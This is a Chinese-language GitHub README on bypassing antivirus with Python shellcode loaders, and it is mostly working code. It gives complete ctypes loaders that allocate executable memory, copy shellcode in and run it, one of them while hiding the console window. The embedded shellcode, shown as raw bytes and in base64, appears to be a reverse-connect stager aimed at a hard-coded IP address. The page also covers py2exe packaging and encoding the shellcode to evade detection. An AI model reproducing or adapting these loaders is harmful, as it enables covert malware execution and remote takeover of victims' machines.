TSY244/ByPassAvLearnPython (github.com)
简介
基本的思路
Py 源代码编译exe
使用python 加载c 代码
py2exe 打包编译exe
base64 shellcode 之后进行加载
py+c 编译exe
Xor 加密
Aes 加密
Python 加载器
HEX加密
base64 加密
具体实现
Py 源代码编译exe
python 加载c 代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
|
import ctypes
shellcode = b""
shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
writable_shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(
ctypes.c_void_p(0),
ctypes.c_size_t(len(shellcode)),
ctypes.c_uint(0x3000),
ctypes.c_uint(0x40)
)
if not ptr:
raise Exception("VirtualAlloc failed, error code: %d" % ctypes.get_last_error())
buf = (ctypes.c_char * len(writable_shellcode)).from_buffer(writable_shellcode)
if not ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
ctypes.create_string_buffer(shellcode),
len(shellcode)
):
raise Exception("RtlMoveMemory failed, error code: %d" % ctypes.get_last_error())
ht = ctypes.windll.kernel32.CreateThread(
ctypes.c_void_p(0),
ctypes.c_size_t(0),
ctypes.c_void_p(ptr),
ctypes.c_void_p(0),
ctypes.c_uint(0),
ctypes.byref(ctypes.c_ulong(0))
)
if not ht:
raise Exception("CreateThread failed, error code: %d" % ctypes.get_last_error())
if ctypes.windll.kernel32.WaitForSingleObject(
ctypes.c_void_p(ht),
ctypes.c_int(-1)
) == 0xFFFFFFFF:
raise Exception("WaitForSingleObject failed, error code: %d" % ctypes.get_last_error())
|
py2exe 打包编译exe
本质上就是直接加载python 但是要求是对方需要有python 环境
个人感觉对于linux 这种本身就有python 环境的可能会有出乎意料的效果
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| from distutils.core import setup
import py_load_c_Load
setup(
name = "Meter",
description = "Python-based App",
version = "1.0",
console = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
)
|
其中注意导入自己的pyhton
base64 shellcode 之后进行加载
个人感觉base64 加载器的效果会更好,这样写在程序里面的,风险都太大了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
|
import ctypes
import base64
encode_shellcode = b'/EiD5PDozAAAAEFRQVBSSDHSZUiLUmBIi1IYUUiLUiBWTTHJSItyUEgPt0pKSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0ESLQCBQi0gYSQHQ41ZNMclI/8lBizSISAHWSDHAQcHJDaxBAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAF9RwKhPiUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V'
shellcode = base64.b64decode(encode_shellcode)
writable_shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(
ctypes.c_void_p(0),
ctypes.c_size_t(len(shellcode)),
ctypes.c_uint(0x3000),
ctypes.c_uint(0x40)
)
if not ptr:
raise Exception("VirtualAlloc failed, error code: %d" % ctypes.get_last_error())
buf = (ctypes.c_char * len(writable_shellcode)).from_buffer(writable_shellcode)
if not ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
ctypes.create_string_buffer(shellcode),
len(shellcode)
):
raise Exception("RtlMoveMemory failed, error code: %d" % ctypes.get_last_error())
ht = ctypes.windll.kernel32.CreateThread(
ctypes.c_void_p(0),
ctypes.c_size_t(0),
ctypes.c_void_p(ptr),
ctypes.c_void_p(0),
ctypes.c_uint(0),
ctypes.byref(ctypes.c_ulong(0))
)
if not ht:
raise Exception("CreateThread failed, error code: %d" % ctypes.get_last_error())
if ctypes.windll.kernel32.WaitForSingleObject(
ctypes.c_void_p(ht),
ctypes.c_int(-1)
) == 0xFFFFFFFF:
raise Exception("WaitForSingleObject failed, error code: %d" % ctypes.get_last_error())
|
py+c 编译exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
| import ctypes
buf = b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
buf += b"\x41\x50\x52\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += b"\x8b\x52\x18\x51\x48\x8b\x52\x20\x56\x4d\x31\xc9"
buf += b"\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x48\x31\xc0"
buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
buf += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
buf += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"
buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x50"
buf += b"\x8b\x48\x18\x49\x01\xd0\xe3\x56\x4d\x31\xc9\x48"
buf += b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0"
buf += b"\x41\xc1\xc9\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1"
buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
buf += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"
buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
buf += b"\x49\xbc\x02\x00\x5f\x51\xc0\xa8\x4f\x89\x41\x54"
buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"
buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"
buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"
buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"
buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"
buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"
buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"
buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"
buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"
buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
buf += b"\xf0\xb5\xa2\x56\xff\xd5"
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
buf = ctypes.c_char_p(buffer)
size = len(buffer)
addr = ctypes.libc.valloc(size)
addr = ctypes.c_void_p(addr)
if 0 == addr:
raise Exception("Failed to allocate memory")
ctypes.memmove(addr, buf, size)
if 0 != ctypes.libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
raise Exception("Failed to set protection on buffer")
return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
if 1:
ctypes.windll.user32.ShowWindow(whnd, 0)
ctypes.windll.kernel32.CloseHandle(whnd)
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ptr = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(memorywithshell),
ctypes.create_string_buffer(buf),
len(buf)
)
shell = ctypes.cast(memorywithshell, ctypes.CFUNCTYPE(ctypes.c_void_p))
shell()
|
Xor 加密
不展示,本质都是对shellcode 进行加密
Aes 加密
不展示,本质都是对shellcode 进行加密
Python 加载器
使用python 直接调用cpp 的dll
具体可以参考
1
2
3
4
5
| import ctypes
lib=ctypes.CDLL("./HelloDll.dll")
lib.hello()
|
尝试使用dll 进行加载dll 然后dll 加载成为shellcode